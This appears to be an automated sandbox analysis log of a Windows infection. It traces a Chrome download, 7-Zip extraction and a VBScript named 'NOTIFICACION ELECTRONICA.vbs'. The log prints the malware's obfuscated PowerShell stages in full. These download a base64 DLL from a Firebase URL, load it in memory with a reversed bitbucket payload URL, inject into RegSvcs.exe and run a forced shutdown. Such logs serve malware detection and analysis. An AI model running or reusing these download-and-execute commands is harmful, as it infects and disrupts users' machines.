PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 3788	5040	chrome.exe	84
PID 5040 wrote to memory of 1500	5040	chrome.exe	85
PID 5040 wrote to memory of 1500	5040	chrome.exe	85
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86
PID 5040 wrote to memory of 4124	5040	chrome.exe	86

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://drive.usercontent.google.com/download?id=1Jl2D3k0Hv3L5qUszIiOYPc66hMAiJu43
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9f702cc40,0x7ff9f702cc4c,0x7ff9f702cc58
  2⤵
  PID:1100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1896,i,8451385262681947568,16634053394969789555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1892 /prefetch:2
  2⤵
  PID:3788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,8451385262681947568,16634053394969789555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2164 /prefetch:3
  2⤵
  PID:1500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,8451385262681947568,16634053394969789555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2472 /prefetch:8
  2⤵
  PID:4124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,8451385262681947568,16634053394969789555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3168 /prefetch:1
  2⤵
  PID:2356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,8451385262681947568,16634053394969789555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3212 /prefetch:1
  2⤵
  PID:2544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4592,i,8451385262681947568,16634053394969789555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4604 /prefetch:8
  2⤵
  PID:2964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=5056,i,8451385262681947568,16634053394969789555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4964 /prefetch:1
  2⤵
  PID:4664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=5108,i,8451385262681947568,16634053394969789555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5092 /prefetch:1
  2⤵
  PID:4560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5328,i,8451385262681947568,16634053394969789555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5432 /prefetch:1
  2⤵
  PID:1268
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=208,i,8451385262681947568,16634053394969789555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5096 /prefetch:1
  2⤵
  PID:744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3280,i,8451385262681947568,16634053394969789555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4968 /prefetch:1
  2⤵
  PID:3464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4884,i,8451385262681947568,16634053394969789555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5072 /prefetch:8
  2⤵
  PID:896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5016,i,8451385262681947568,16634053394969789555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5748 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:3100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5748,i,8451385262681947568,16634053394969789555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4376 /prefetch:8
  2⤵
  PID:3408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4816,i,8451385262681947568,16634053394969789555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5744 /prefetch:8
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:1952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5792,i,8451385262681947568,16634053394969789555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5920 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:1200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5944,i,8451385262681947568,16634053394969789555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5904 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:3548

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2924

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:932

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Unconfirmed 165508\" -ad -an -ai#7zMap610:112:7zEvent23534
1⤵
- Suspicious use of FindShellTrayWindow
PID:4776

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION ELECTRONICA.vbs"
1⤵
- Checks computer location settings
PID:4272
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bo▒Gs▒bgBx▒GU▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒HU▒ZwBz▒GM▒dw▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒HM▒cQBx▒GI▒ag▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒cwBx▒HE▒YgBq▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒JwB0▒Hg▒d▒▒u▒G8▒dgBl▒HU▒bgBv▒Gk▒dgBu▒GU▒LwBz▒GQ▒YQBv▒Gw▒bgB3▒G8▒Z▒▒v▒HM▒YQBn▒HI▒YQBj▒HM▒ZQBk▒C8▒YwBk▒HM▒YQBj▒GQ▒LwBn▒HI▒bw▒u▒HQ▒ZQBr▒GM▒dQBi▒HQ▒aQBi▒C8▒Lw▒6▒HM▒c▒B0▒HQ▒a▒▒n▒C▒▒L▒▒g▒CQ▒dQBn▒HM▒YwB3▒C▒▒L▒▒g▒Cc▒XwBf▒F8▒XwBk▒HM▒ZgBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bo▒Gs▒bgBx▒GU▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION ELECTRONICA.vbs');powershell -command $KByHL;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2480
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$hknqe = '0';$ugscw = 'C:\Users\Admin\Downloads\NOTIFICACION ELECTRONICA.vbs';[Byte[]] $sqqbj = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($sqqbj).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.oveunoivne/sdaolnwod/sagracsed/cdsacd/gro.tekcubtib//:sptth' , $ugscw , '____dsf___________________-------------', $hknqe, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:2124
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:2496
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1540
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c Shutdown /s /f /t 00
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3984
      - C:\Windows\SysWOW64\shutdown.exe
        
        Shutdown /s /f /t 00
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2548

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION ELECTRONICA.vbs"
1⤵
- Checks computer location settings
PID:2876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bo▒Gs▒bgBx▒GU▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒HU▒ZwBz▒GM▒dw▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒HM▒cQBx▒GI▒ag▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒cwBx▒HE▒YgBq▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒JwB0▒Hg▒d▒▒u▒G8▒dgBl▒HU▒bgBv▒Gk▒dgBu▒GU▒LwBz▒GQ▒YQBv▒Gw▒bgB3▒G8▒Z▒▒v▒HM▒YQBn▒HI▒YQBj▒HM▒ZQBk▒C8▒YwBk▒HM▒YQBj▒GQ▒LwBn▒HI▒bw▒u▒HQ▒ZQBr▒GM▒dQBi▒HQ▒aQBi▒C8▒Lw▒6▒HM▒c▒B0▒HQ▒a▒▒n▒C▒▒L▒▒g▒CQ▒dQBn▒HM▒YwB3▒C▒▒L▒▒g▒Cc▒XwBf▒F8▒XwBk▒HM▒ZgBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bo▒Gs▒bgBx▒GU▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION ELECTRONICA.vbs');powershell -command $KByHL;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1536
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$hknqe = '0';$ugscw = 'C:\Users\Admin\Downloads\NOTIFICACION ELECTRONICA.vbs';[Byte[]] $sqqbj = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($sqqbj).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.oveunoivne/sdaolnwod/sagracsed/cdsacd/gro.tekcubtib//:sptth' , $ugscw , '____dsf___________________-------------', $hknqe, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:4764
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:3048
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1772

C:\Windows\System32\CScript.exe
"C:\Windows\System32\CScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION ELECTRONICA.vbs"
1⤵
- Checks computer location settings
PID:2016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bo▒Gs▒bgBx▒GU▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒HU▒ZwBz▒GM▒dw▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒HM▒cQBx▒GI▒ag▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒cwBx▒HE▒YgBq▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒JwB0▒Hg▒d▒▒u▒G8▒dgBl▒HU▒bgBv▒Gk▒dgBu▒GU▒LwBz▒GQ▒YQBv▒Gw▒bgB3▒G8▒Z▒▒v▒HM▒YQBn▒HI▒YQBj▒HM▒ZQBk▒C8▒YwBk▒HM▒YQBj▒GQ▒LwBn▒HI▒bw▒u▒HQ▒ZQBr▒GM▒dQBi▒HQ▒aQBi▒C8▒Lw▒6▒HM▒c▒B0▒HQ▒a▒▒n▒C▒▒L▒▒g▒CQ▒dQBn▒HM▒YwB3▒C▒▒L▒▒g▒Cc▒XwBf▒F8▒XwBk▒HM▒ZgBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bo▒Gs▒bgBx▒GU▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( 